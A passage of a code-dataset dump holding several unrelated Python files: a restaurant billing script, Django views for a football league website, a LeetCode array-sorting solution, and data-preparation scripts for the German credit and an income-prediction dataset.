\")\r\n else:\r\n break\r\n print()\r\n for i in range(10):\r\n y=int(input(\"If you want something else, enter dish number, else enter 0.\\nPlease enter here: \"))\r\n if y!=0:\r\n for i in l1:\r\n if (i==y) :\r\n b=(l2[i])\r\n print(b)\r\n final.append(b)\r\n else:\r\n break\r\n if len(final)>0: \r\n print(\"your items are : \",final)\r\n else:\r\n print(\"You haven't ordered anything!\")\r\n\r\n fp=[]\r\n bill=[]\r\n for i in final:\r\n for j in l2:\r\n if i==j:\r\n q=l2.index(j)\r\n fp.append(q)\r\n#print(fp)\r\n for i in fp:\r\n w=price[i]\r\n bill.append(w)\r\n \r\n#print(bill)\r\n\r\n sum=0\r\n for i in bill:\r\n sum+=i\r\n print(\"Your Bill for table number \",int(t),'is: ', sum ,'rs')\r\n print(\"Glad to serve you, COME AGAIN !\")\r\n print()\r\n\r\n\r\n","repo_name":"arsh-dev/restaurant","sub_path":"final_shop.py","file_name":"final_shop.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25093805760","text":"from django.conf.global_settings import MEDIA_URL\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render, redirect\nfrom .models import *\nfrom .Forms import UserForm, TeamForm, PlayerForm, PlayerEditForm, Protocol, MatchForm\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\n\n\n# Create your views here.\n\n\ndef base(request):\n return render(request, 'base.html')\n\n\ndef home(request):\n teams = Team.objects.all()\n return render(request, 'home.html', {'teams': teams})\n\n\ndef EditTeam(request):\n if request.user.groups.filter(name='Trener').exists():\n firstNameTrainer = request.user.first_name\n secondNameTrainer = request.user.last_name\n trainere = Trainer.objects.get_or_create(firstname=firstNameTrainer, secondname=secondNameTrainer)\n\n idTrainer = trainere[0].id_trainer\n\n try:\n idTeam = Team.objects.get(id_trainer=idTrainer).id_team\n number_of_players = Player.objects.filter(id_team=idTeam).count()\n\n logo = Team.objects.get(id_trainer=idTrainer).logo\n date_creation = Team.objects.get(id_trainer=idTrainer).date_creation\n\n except(KeyError, Team.DoesNotExist):\n return HttpResponseRedirect(reverse('mainapp:newTeamTrainer'))\n\n nameTeam = Team.objects.get(id_trainer=idTrainer).name\n players = Player.objects.filter(id_team=idTeam)\n return render(request, 'team.html',\n {'players': players, 'nameTeam': nameTeam, 'logo': logo, 'date_creation': date_creation,\n 'number_of_players': number_of_players})\n else:\n return render(request, 'error.html', {'message': \"Only trainers have permission to this section\"})\n\n\ndef matches(request):\n queues = Queue.objects.all()\n try:\n selected_choice = Queue.objects.get(idQueue=request.GET['queueid'])\n matches = Match.objects.filter(idQueue=selected_choice)\n except(KeyError, Queue.DoesNotExist):\n return render(request, 'matches.html', {'queues': queues})\n else:\n return render(request, 'matches.html',\n {'matches': matches, 'queues': queues, 'selected_choice': selected_choice})\n\n\ndef table(request):\n teamstats = StatsTeam.objects.all().order_by('-numberOfScores', '-numberOfMatchesWon')\n\n king_of_goals = 
StatsPlayerLeague.objects.all().order_by('-numberOfGoals')\n return render(request, 'teamstats.html', {'teamstats': teamstats, 'king_of_goals': king_of_goals})\n\n\ndef about(request):\n try:\n model = HTMLModels.objects.get(page_name='about')\n except ObjectDoesNotExist:\n return render(request, 'about.html')\n\n return render(request, 'about.html', {'model': model})\n\n\ndef register_form(request):\n form = UserForm(request.POST)\n\n if form.is_valid():\n user = form.save()\n group = form.cleaned_data['group_name']\n first_name = form.cleaned_data['first_name']\n second_name = form.cleaned_data['last_name']\n group.user_set.add(user)\n\n if str(group) == \"Trener\":\n trener = Trainer.objects.create(firstname=first_name, secondname=second_name)\n trener.save()\n return HttpResponseRedirect(reverse('mainapp:home'))\n else:\n form = UserForm()\n\n return render(request, 'register_form.html', {'form': form})\n\n\n@login_required\ndef new_team(request):\n form = TeamForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('mainapp:home'))\n return render(request, 'team_form.html', {'form': form})\n\n\n@login_required\ndef new_teamTrainer(request):\n form = TeamForm(request.POST or None, request.FILES or None)\n firstName = request.user.first_name\n lastName = request.user.last_name\n id_trainer = Trainer.objects.get(firstname=firstName, secondname=lastName).id_trainer\n if form.is_valid():\n form.save()\n name_team = form.cleaned_data['name']\n date_creation = form.cleaned_data['date_creation']\n # Team.objects.get(name=name_team,date_creation=date_creation)\n Team.objects.filter(name=name_team, date_creation=date_creation).update(id_trainer=id_trainer)\n return HttpResponseRedirect(reverse('mainapp:home'))\n return render(request, 'team_form.html', {'form': form})\n\n\n@login_required\ndef create_player(request):\n if request.user.groups.filter(name='Trener').exists():\n\n form = PlayerForm(request.POST)\n firstName = request.user.first_name\n lastName = request.user.last_name\n id_trainer = Trainer.objects.get(firstname=firstName, secondname=lastName).id_trainer\n id_team = Team.objects.get(id_trainer=id_trainer).id_team\n\n # if Player.objects.filter(id_team=id_team).count() > 3:\n # return render(request, 'error.html', {'message': \"You can only create 2 players\"})\n\n if form.is_valid():\n form.save()\n psl = form.cleaned_data['pesel']\n Player.objects.filter(pesel=psl).update(id_team=id_team)\n return HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'RegisterTeamPlayer.html', {'form': form})\n else:\n return render(request, 'error.html', {'message': \"Only trainers have permission to this section\"})\n\n\n@login_required\ndef edit_player(request, pesel):\n player = get_object_or_404(Player, pk=pesel)\n\n form = PlayerEditForm(request.POST or None, request.FILES or None, instance=player)\n\n if form.is_valid():\n status = form.cleaned_data['statusHealth']\n position = form.cleaned_data['position']\n age = form.cleaned_data['age']\n\n Player.objects.filter(pesel=pesel).update(statusHealth=status)\n Player.objects.filter(pesel=pesel).update(age=age)\n Player.objects.filter(pesel=pesel).update(position=position)\n return HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'EditPlayer.html', {'form': form})\n\n\n@login_required\ndef delete_player(request, pesel):\n player = get_object_or_404(Player, pk=pesel)\n\n if request.method == \"POST\":\n player.delete()\n return 
HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'accept_delete_player.html', {'player': player})\n\n\ndef show_team_stats(request, idTeam):\n stats_team = get_object_or_404(StatsTeam, pk=idTeam)\n team = get_object_or_404(Team, pk=idTeam)\n count_scored_goals = 0\n for player in Player.objects.filter(id_team=idTeam):\n x = StatsPlayerLeague.objects.get(pesel=player.pesel).numberOfGoals\n count_scored_goals = count_scored_goals + x\n\n try:\n id_trainer = Trainer.objects.get(team__id_team=idTeam).id_trainer\n trainer = Trainer.objects.get(id_trainer=id_trainer)\n\n except ObjectDoesNotExist:\n return render(request, 'error.html', {'message': \"Error\"})\n return render(request, 'StatsTeam.html', {'stats_team': stats_team, 'team': team, 'trainer': trainer, 'count_scored_goals': count_scored_goals})\n\n\n@login_required\ndef protocol_refree(request, idMatch):\n if request.user.groups.filter(name='Sedzia').exists():\n try:\n match = get_object_or_404(Match, pk=idMatch)\n home = match.Home\n guest = match.Guest\n id_home_team = Team.objects.get(id_team=home.id_team)\n id_guest_team = Team.objects.get(id_team=guest.id_team)\n\n for player in Player.objects.filter(id_team=id_home_team):\n try:\n StatsPlayerMatch.objects.get(player=player, idMatch=match)\n except ObjectDoesNotExist:\n StatsPlayerMatch.objects.create(player=player, idMatch=match)\n\n for player in Player.objects.filter(id_team=id_guest_team):\n try:\n StatsPlayerMatch.objects.get(player=player, idMatch=match)\n except ObjectDoesNotExist:\n StatsPlayerMatch.objects.create(player=player, idMatch=match)\n\n players_home = Player.objects.filter(id_team=id_home_team)\n players_guest = Player.objects.filter(id_team=id_guest_team)\n\n except ObjectDoesNotExist:\n return render(request, 'error.html', {'message': \"That match doesnt exist\"})\n\n return render(request, 'protocol_refree.html', {'match': match, 'players_home': players_home,\n 'players_guest': players_guest, 'homeTeam': id_home_team,\n 'guestTeam': id_guest_team})\n\n return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n\n@login_required\ndef edit_match(request, pesel, idMatch):\n global form, homeGoals, guestGoals\n\n if request.user.groups.filter(name='Sedzia').exists():\n\n id_player = get_object_or_404(Player, pk=pesel)\n stats = get_object_or_404(StatsPlayerMatch, player=id_player, idMatch=idMatch)\n home_team = Match.objects.get(idMatch=idMatch).Home\n guest_team = Match.objects.get(idMatch=idMatch).Guest\n match = get_object_or_404(Match, pk=idMatch)\n count_home_goals = 0\n count_guest_goals = 0\n current_goals = 0\n\n form = Protocol(request.POST or None, instance=stats)\n\n if form.is_valid():\n goals = form.cleaned_data['numberOfGoals']\n yellow_card = form.cleaned_data['numberOfYellowCard']\n StatsPlayerMatch.objects.filter(idMatch=idMatch, player=id_player).update(numberOfGoals=goals)\n StatsPlayerMatch.objects.filter(idMatch=idMatch, player=id_player).update(numberOfYellowCard=yellow_card)\n\n for match1 in Match.objects.all():\n if match1.Home == id_player.id_team or match1.Guest == id_player.id_team:\n goals_in_match = StatsPlayerMatch.objects.get_or_create(idMatch=match1, player=id_player)[0].numberOfGoals\n current_goals = current_goals + goals_in_match\n\n StatsPlayerLeague.objects.filter(pesel=id_player.pesel).update(numberOfGoals=current_goals)\n\n for player in Player.objects.filter(id_team=home_team):\n try:\n x = StatsPlayerMatch.objects.get(player=player, 
idMatch=idMatch).numberOfGoals\n                    count_home_goals = count_home_goals + x\n                except ObjectDoesNotExist:\n                    count_home_goals = count_home_goals + 0\n\n            for player in Player.objects.filter(id_team=guest_team):\n                try:\n                    x = StatsPlayerMatch.objects.get(player=player, idMatch=idMatch).numberOfGoals\n                    count_guest_goals = count_guest_goals + x\n                except ObjectDoesNotExist:\n                    count_guest_goals = count_guest_goals + 0\n\n            #Match.objects.filter(idMatch=idMatch).update(homeGoals=count_home_goals)\n            #Match.objects.filter(idMatch=idMatch).update(guestGoals=count_guest_goals)\n            # match.homeGoals = count_home_goals\n            # match.guestGoals = count_guest_goals\n            # match.save()\n            # if Match.finished_by_refree == -1:\n            #     Match.save(match)\n\n            match.save_stats(match, count_home_goals, count_guest_goals)\n\n\n            return HttpResponseRedirect(reverse('mainapp:protocol_refree', args=(idMatch,)))\n\n        return render(request, 'Edit_stats_player.html', {'form': form, 'idmatch': idMatch})\n    else:\n        return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n\n\n@login_required\ndef create_match(request):\n    if request.user.groups.filter(name='Sedzia').exists():\n\n        form = MatchForm(request.POST)\n\n        if form.is_valid():\n            form.save()\n            Queue = form.cleaned_data['idQueue']\n            home = form.cleaned_data['Home']\n            guest = form.cleaned_data['Guest']\n            Match.objects.filter(Home=home, Guest=guest, idQueue=Queue)\n            return HttpResponseRedirect(reverse('mainapp:matches'))\n\n        return render(request, 'createMatch.html', {'form': form})\n    else:\n        return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n@login_required\ndef delete_match(request, idMatch):\n    if request.user.groups.filter(name='Sedzia').exists():\n\n        match = get_object_or_404(Match, pk=idMatch)\n\n        if request.method == \"POST\":\n            match.delete()\n            return HttpResponseRedirect(reverse('mainapp:matches'))\n\n        return render(request, 'accept_delete_match.html', {'match': match})\n    else:\n        return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n","repo_name":"pawciok1219/football_league_web","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29781717183","text":"\"\"\"\nGiven an array A of non-negative integers, half of the integers \nin A are odd, and half of the integers are even.\n\nSort the array so that whenever A[i] is odd, i is odd; and \nwhenever A[i] is even, i is even.\n\nYou may return any answer array that satisfies this condition.\n\nExample 1:\n\nInput: [4,2,5,7]\nOutput: [4,5,2,7]\nExplanation: \n[4,7,2,5], [2,5,4,7], [2,7,4,5] would also have been accepted.\n\"\"\"\n\nclass Solution:\n    def sortArrayByParityII(self, A: List[int]) -> List[int]:\n        B = [0] * len(A)\n        odd, even = 1, 0\n        \n        for num in A:\n            if num % 2:\n                B[odd] = num\n                odd += 2\n            else:\n                B[even] = num\n                even += 2\n        \n        return B\n\n\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/922.py","file_name":"922.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15815323262","text":"import urllib\nimport os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split, GridSearchCV, ParameterGrid\nimport pickle\nfrom itertools import
chain\n\npickle_dir = 'german_pickles'\n\nprint(\n'''\nSource:\nProfessor Dr. Hans Hofmann\nInstitut f\"ur Statistik und \"Okonometrie\nUniversit\"at Hamburg\nFB Wirtschaftswissenschaften\nVon-Melle-Park 5\n2000 Hamburg 13\n\nData Set Information:\nTwo datasets are provided. the original dataset, in the form provided by Prof. Hofmann, contains categorical/symbolic attributes and is in the file \"german.data\".\nFor algorithms that need numerical attributes, Strathclyde University produced the file \"german.data-numeric\". This file has been edited and several indicator variables added to make it suitable for algorithms which cannot cope with categorical variables. Several attributes that are ordered categorical (such as attribute 17) have been coded as integer. This was the form used by StatLog.\n\nThis dataset requires use of a cost matrix:\n. 1 2\n------\n1 0 1\n-----\n2 5 0\n\n(1 = Good, 2 = Bad)\nThe rows represent the actual classification and the columns the predicted classification.\nIt is worse to class a customer as good when they are bad (5), than it is to class a customer as bad when they are good (1).\n'''\n)\n\n# helper function for data frame str / summary\ndef rstr(df):\n return df.shape, df.apply(lambda x: [x.unique()])\n\n# helper function for pickling files\ndef pickle_path(filename):\n return(pickle_dir + '\\\\' + filename)\n\n# random seed for test_train_split\nseed=123\n\nvar_names = ['chk'\n , 'dur'\n , 'crhis'\n , 'pps'\n , 'amt'\n , 'svng'\n , 'emp'\n , 'rate'\n , 'pers'\n , 'debt'\n , 'res'\n , 'prop'\n , 'age'\n , 'plans'\n , 'hous'\n , 'creds'\n , 'job'\n , 'deps'\n , 'tel'\n , 'foreign'\n , 'rating']\n\nvars_types = ['nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'nominal']\n\nclass_col = 'rating'\nfeatures = [vn for vn in var_names if vn != class_col]\n\nif True:\n '''\n target_url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/statlog/german/german.data'\n\n german_bytes = urllib.request.urlopen(target_url)\n german = pd.read_csv(german_bytes,\n header=None,\n delimiter=' ',\n index_col=False,\n names=var_names)\n\n # re-code rating class variable\n rating = pd.Series(['good'] * german.count()[0])\n rating.loc[german.rating == 2] = 'bad'\n german.rating = rating\n\n # kill continuous vars for now\n # to_be_del = ['dur', 'amt', 'rate', 'res', 'age', 'creds', 'deps']\n #for tbd in to_be_del:\n # del german[tbd]\n # del vars_types[np.where(np.array(var_names) == tbd)[0][0]]\n # del var_names[np.where(np.array(var_names) == tbd)[0][0]]\n # del features[np.where(np.array(features) == tbd)[0][0]]\n\n german.to_csv(pickle_path('german.csv.gz'), index=False, compression='gzip')\n '''\n \ngerman = pd.read_csv(pickle_path('german.csv.gz'), compression='gzip')\n\n# the following creates a copy of the data frame with int mappings of categorical variables for scikit-learn\n# and also a dictionary containing the label encoders/decoders for each column\ngerman_pre = pd.DataFrame.copy(german)\n\nle_dict = {}\nvars_dict = {}\nonehot_dict = {}\n\nfor v, t in zip(var_names, vars_types):\n if t == 'nominal':\n # create a label encoder for all categoricals\n le_dict[v] = LabelEncoder().fit(german[v].unique())\n # create a dictionary of categorical names\n names = list(le_dict[v].classes_)\n # transform each 
categorical column\n german_pre[v] = le_dict[v].transform(german[v])\n # create the reverse lookup\n for n in names:\n onehot_dict[v + '_' + str(n)] = v\n else:\n german_pre[v] = german[v]\n\n vars_dict[v] = {'labels' : names if t == 'nominal' else None\n , 'onehot_labels' : [v + '_' + str(n) for n in names] if t == 'nominal' else None\n , 'class_col' : True if v == class_col else False\n , 'data_type' : t}\n\ncategorical_features=[i for i, (c, t) in enumerate(zip([vars_dict[f]['class_col'] for f in features],\n[vars_dict[f]['data_type'] == 'nominal' for f in features])) if not c and t]\n\n# creates a flat list just for the features\nonehot_features = []\ncontinuous_features = []\nfor f, t in zip(var_names, vars_types):\n if f == class_col: continue\n if t == 'continuous':\n continuous_features.append(f)\n else:\n onehot_features.append(vars_dict[f]['onehot_labels'])\n\n# They get stuck on the end by encoding\nonehot_features.append(continuous_features)\n# flatten out the nesting\nonehot_features = list(chain.from_iterable(onehot_features))\n\n# a function to return any code from a label\ndef get_code(col, label):\n return le_dict[col].transform([label])[0]\n\n# a function to return any label from a code\ndef get_label(col, label):\n return le_dict[col].inverse_transform([label])[0]\n\n# there is a bug in sklearn causing all the warnings. This should be fixed in next release.\ndef pretty_print_tree_votes(paths, preds, labels):\n for instance in paths.keys():\n print('Instance ' + str(instance) + ': True Class = ' +\n str(labels.values[instance]) + ' ' +\n str(get_label(class_col, labels.values[instance])) +\n ' Pred Class = ' + str(preds[instance]) + ' ' +\n str(get_label(class_col, preds[instance])) +\n ' Majority voting trees = ' + str(len(paths[instance])))\n\nclass_names = list(le_dict[class_col].classes_)\n\n# train test splitting\nX, y = german_pre[features], german_pre[class_col]\n\n# split into training and test\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=seed)\n\ntrain_priors = y_train.value_counts().sort_index()/len(y_train)\ntest_priors = y_test.value_counts().sort_index()/len(y_test)\n\n# one hot encoding required for classifier\n# otherwise integer vectors will be treated as ordinal\n# OneHotEncoder takes an integer list as an argument to state which columns to encode\nencoder = OneHotEncoder(categorical_features=categorical_features)\nencoder.fit(german_pre.as_matrix())\nX_train_enc = encoder.transform(X_train)\n\nif not os.path.exists(pickle_dir):\n os.makedirs(pickle_dir)\n\nencoder_store = open(pickle_path('encoder.pickle'), \"wb\")\npickle.dump(encoder, encoder_store)\nencoder_store.close()\n\nX_train_enc_store = open(pickle_path('X_train_enc.pickle'), \"wb\")\npickle.dump(X_train_enc, X_train_enc_store)\nX_train_enc_store.close()\n\ny_train_store = open(pickle_path('y_train.pickle'), \"wb\")\npickle.dump(y_train, y_train_store)\ny_train_store.close()\n\npickle_dir_store = open(\"pickle_dir.pickle\", \"wb\")\npickle.dump(pickle_dir, pickle_dir_store)\npickle_dir_store.close()\n\nprint('''Utility code in the associated file performs the following steps:\nset random seed for the test_train_split\nimport packages and modules\ndefines a custom summary function: rstr()\ncreate the list of variable names: var_names\ncreate the list of features (var_names less class): features\nimport the german.csv file\ncreate the pandas dataframe and prints head: german\ncreate the categorical var encoder dictionary: le_dict\ncreate a function to 
get any code for a column name and label: get_code\ncreate the dictionary of categorical values: categories\ncreates the list of one hot encoded variable names, onehot_features\ncreate the list of class names: class_names\ncreate the pandas dataframe with encoded vars: german_pre\ncreate the pandas dataframe containing all features less class: X\ncreate the pandas series containing the class 'decision': y\ncreate the training and test sets: X_train, y_train, X_test, y_test\nevaluate the training and test set priors and print them: train_priors, test_priors\ncreate a One Hot Encoder and encode the train set: X_train_enc\n(avoids treating variables as ordinal or continuous)\npickles objects that are needed by later steps: encoder, X_train_enc, y_train\ncreates a closure with the location of the pickle files for easy access to the stored datasets: pickle_path()\n''')\n\nprint(\"german.head()\")\nprint(german.head())\n\nshp, variables = rstr(german)\nprint()\nprint(\"shape\")\nprint(shp)\nprint()\nprint(\"variables summary\")\nprint(variables)\n\nprint(\"\\n\")\nprint(\"Training Priors\")\nfor c, p in zip(class_names, train_priors):\n print(c, p)\n\nprint(\"\\n\")\nprint(\"Test Priors\")\nfor c, p in zip(class_names, test_priors):\n print(c, p)\n","repo_name":"julianhatwell/interpret_basics2","sub_path":"german_dataprep.py","file_name":"german_dataprep.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10387965752","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### Importing libraries\n\n# In[1]:\n\n\n# from keras.callbacks import ModelCheckpoint\n# from keras.models import Sequential\n# from keras.layers import Dense, Activation, Flatten\n# from sklearn.model_selection import train_test_split\n# from sklearn.ensemble import RandomForestRegressor\n# from sklearn.metrics import mean_absolute_error \n# from matplotlib import pyplot as plt\n# import seaborn as sb\n# import matplotlib.pyplot as plt\n# import pandas as pd\n# import numpy as np\n# import warnings \n# warnings.filterwarnings('ignore')\n# warnings.filterwarnings('ignore', category=DeprecationWarning)\n# from xgboost import XGBRegressor\n\n\n# In[2]:\n\n\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score, train_test_split\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport xgboost as xgb\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport joblib\n# from sklearn.metrics import accuracy_score\nimport category_encoders as ce\nfrom catboost import CatBoostRegressor\nimport random\nnp.random.seed(23)\n\n\n# #### Reading data set\n\n# In[3]:\n\n\ndef train_test():\n df = pd.read_csv('../Data/tcd ml 2019-20 income prediction training (with labels).csv')\n df['Income in EUR2'] = pd.qcut(df['Income in EUR'], 10, labels=False)\n y = df.pop('Income in EUR2')\n X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.15, stratify=y)\n df_val = X_test\n df = X_train\n return df_val, df\n\n\n# #### Outlier Detection\n\n# In[4]:\n\n\ndef rem_outliers(df):\n df_ = df.copy()\n median = df['Income in EUR'].median()\n std = df['Income in EUR'].std()\n df_ = df_[df_['Income in EUR'] >= median - (2*std)]\n df_ = df_[df_['Income in 
EUR'] <= median + (2*std)]\n    return df_\n\n\n# #### Creating Train Test\n\n# In[5]:\n\n\ndef freq_chart_cat(df,a):\n    df2 = df.groupby(a).agg({'Instance':'count'}).sort_values(by=a)\n    ax = df2['Instance'].plot(kind='bar', title =a+\" Freq\", figsize = [df2.shape[0]*0.5,5], legend=True, fontsize=18)\n    ax.set_xlabel(a, fontsize=20)\n    ax.set_ylabel(\"Freq\", fontsize=20)\n    print(a+' Frequency check \\n')\n    print(df2)\n    print(plt.show())\n    print('\\n\\n')\n\ndef num_hist(df,a):\n    plt.hist(df[a], density=True, bins=20)\n    plt.ylabel('Probability')\n    plt.xlabel(a)\n    print(a+' Frequency check \\n')\n    print(plt.show())\n    print('\\n\\n')\n\ndef data_explore(df, charts = 'False'):\n    unique_size = []\n    zeros = []\n    cols = []\n    blanks = []\n    unknowns = []\n    \n    for i in df:\n        cols.append(i)\n        unique_size.append(str(round(df[i].nunique()*100/df.shape[0],2))+'%')\n\n        l = list(df[i])\n        n = 0\n        m = 0\n        u = 0\n        for j in l:\n            if str(j).strip() == '0':\n                n += 1\n            if str(j).strip() == '':\n                m += 1\n            if str(j).lower() == 'unknown':\n                u += 1\n        zeros.append(n)\n        blanks.append(m)\n        unknowns.append(u)\n    \n    df_info2 = pd.DataFrame({'Data Type':df.dtypes.tolist(), 'Number of Nulls':df.isna().sum().tolist(), 'Number of Zeroes':zeros, 'Number of Blanks':blanks, 'Number of Unknowns':unknowns, 'Percentage of Unique Values':unique_size})\n    df_info2.index = cols\n    df_describe = pd.DataFrame(df.describe()).transpose()\n    df_info3 = df_info2.merge(df_describe,left_on = df_info2.index, right_on = df_describe.index, how = 'left')\n    df_info3 = df_info3.rename(columns = {'key_0':'columns'})\n    df_info3 = df_info3.set_index('columns')\n    \n    if charts == 'True':\n        for i in df.columns:\n            if df[i].nunique() < 20:\n                freq_chart_cat(df,i)\n            if df[i].dtype.kind in 'bifc':\n                num_hist(df,i)\n    return df_info3\n\n\n# ### Data Cleaning\n# 1. Converting to lowercase\n# 2. replacing unknowns by NaN\n# 3.
imputing nulls\n\n# In[6]:\n\n\ndef zero_to_nulls(df):\n for i in df:\n if df[i].dtype.kind in 'bifuc':\n df.loc[:,i] = df.loc[:,i].replace(0,np.nan)\n else:\n df.loc[:,i] = df.loc[:,i].replace('0',np.nan)\n return df\n\ndef unknown_to_nulls(df):\n for i in df:\n if df[i].dtype.kind not in 'bifuc':\n df.loc[:,i] = df.loc[:,i].replace('unknown',np.nan)\n return df\n\ndef convert_lower(df):\n for i in df:\n if df[i].dtype.kind not in 'biufc':\n df.loc[:,i] = df.loc[:,i].str.lower()\n df.loc[:,i] = df.loc[:,i].str.strip()\n return df\n\n\n# In[7]:\n\n\ndef cleaner1(df):\n df2 = convert_lower(df)\n df2 = unknown_to_nulls(df2)\n df2.loc[:,'Wears Glasses'] = df2.loc[:,'Wears Glasses'].apply(str)\n df2.loc[:,'Wears Glasses'] = np.where(df2.loc[:,'Wears Glasses'] == '0', 'No',np.where(df2.loc[:,'Wears Glasses'] == '1', 'Yes',df2.loc[:,'Wears Glasses']))\n df2.loc[:,'Gender'] = df2.loc[:,'Gender'].replace('other',np.nan)\n df2 = zero_to_nulls(df2)\n return df2\n\n\n# #### Treating profession variable\n\n# In[8]:\n\n\ndef unique(list1): \n # intilize a null list \n unique_list = [] \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x) \n return unique_list\n\ndef profession_cleaner(df, df2, stretch = 0.8):\n dfx = df[df['Profession'].notnull()]\n\n dfx = dfx[['Profession','Income in EUR']]\n\n dfx['Profession'] = dfx['Profession'].str.lower()\n\n chars = []\n for i in list(dfx['Profession']):\n for j in i:\n if (ord(j) in list(range(65,91))) or (ord(j) in list(range(97,123))):\n chars = chars\n else:\n chars.append(j)\n\n for i in unique(chars):\n if i != ' ':\n dfx['Profession'] = dfx['Profession'].str.replace(i,' ')\n\n df_prof = dfx['Profession'].str.split(' ', 10, expand=True)\n\n df_prof['Income in EUR'] = dfx['Income in EUR']\n\n l = []\n val = []\n for i in df_prof.columns[:-1]:\n df_prof2 = df_prof[df_prof[i].notnull()]\n m = df_prof2.iloc[:,i].tolist()\n n = df_prof2['Income in EUR'].tolist()\n for j in m:\n l.append(j)\n for k in n:\n val.append(k)\n\n df_prof3 = pd.DataFrame({'Words':l,'Income in EUR':val})\n df_prof4 = df_prof3.groupby('Words',as_index = False).agg({'Income in EUR':['mean','var','count']})\n df_prof4.columns = df_prof4.columns.droplevel(level=0)\n df_prof4['var_sum'] = df_prof4['var'] * df_prof4['count']\n df_prof4 = df_prof4.drop(columns = ['count'])\n df_prof4.columns = ['Words','mean','var','count']\n\n df_prof4 = df_prof4[df_prof4['Words'] != ' ']\n df_prof4 = df_prof4[df_prof4['Words'] != '']\n df_prof4 = df_prof4[df_prof4['Words'] != 'and']\n\n df_prof5 = df_prof4.copy()\n\n df_prof5['total_word_count'] = df_prof5['count'].sum()\n\n df_prof5 = df_prof5.sort_values(by = 'count', ascending = False)\n\n df_prof5['cnt_cumsum'] = df_prof5['count'].cumsum()\n\n df_prof5['cum_perc'] = df_prof5['cnt_cumsum']/df_prof5['total_word_count']\n\n df_prof5 = df_prof5[df_prof5['cum_perc'] <= stretch]\n\n# print('Number of Significant words = ')\n# print(df_prof5.shape[0])\n\n sig_words = list(df_prof5['Words'])\n# print('Significant words are')\n# print(sig_words)\n\n extra_cols = []\n for i in sig_words:\n df2['is_'+i] = np.where(df2['Profession'].str.contains(i),'yes','no')\n extra_cols.append('is_'+i)\n \n return df2, extra_cols, sig_words\n\n\n# #### Creating a missing value imputer\n\n# In[9]:\n\n\ndef miss_val_impute(df, cat_vars, num_imp = 'mean'):\n for i in df:\n if i not in cat_vars:\n if num_imp == 'mean':\n x = df[i].mean()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 
'median':\n x = df[i].median()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'mode':\n x = df[i].mode()\n df[i] = df[i].replace(np.nan,x)\n else:\n df[i] = np.where(df[i].isna(),df[i].mode(),df[i])\n return df\n\ndef mvi(df2, extra_cols):\n df3 = df2.copy()\n cat_vars = ['Gender','Country','Profession','University Degree','Wears Glasses','Hair Color'] + extra_cols\n df3 = miss_val_impute(df3, cat_vars,num_imp = 'median')\n return df3,cat_vars\n\n\n# #### Label Encoding\n\n# In[10]:\n\n\n# dfx = df[df['Profession'].notnull()]\n\n# dfx['Profession'] = dfx['Profession'].str.lower()\n\n# df_prof = dfx['Profession'].str.split(' ', 10, expand=True)\n\n# df_prof['Income in EUR'] = dfx['Income in EUR']\n\n# l = []\n# val = []\n# for i in df_prof.columns[:-1]:\n# df_prof2 = df_prof[df_prof[i].notnull()]\n# m = df_prof2.iloc[:,i].tolist()\n# n = df_prof2['Income in EUR'].tolist()\n# for j in m:\n# l.append(j)\n# for k in n:\n# val.append(k)\n \n# df_prof3 = pd.DataFrame({'Words':l,'Income in EUR':val})\n# df_prof4 = df_prof3.groupby('Words',as_index = False).agg({'Income in EUR':['mean','var','count']})\n# df_prof4.columns = df_prof4.columns.droplevel(level=0)\n# # df_prof4['var_sum'] = df_prof4['var'] * df_prof4['count']\n# df_prof4 = df_prof4.drop(columns = ['count'])\n# df_prof4.columns = ['Words','mean','var']\n# print(df_prof4.head())\n\n# d_prof = {}\n# for i in dfx['Profession'].unique():\n# least_var = 10**20\n# for j in 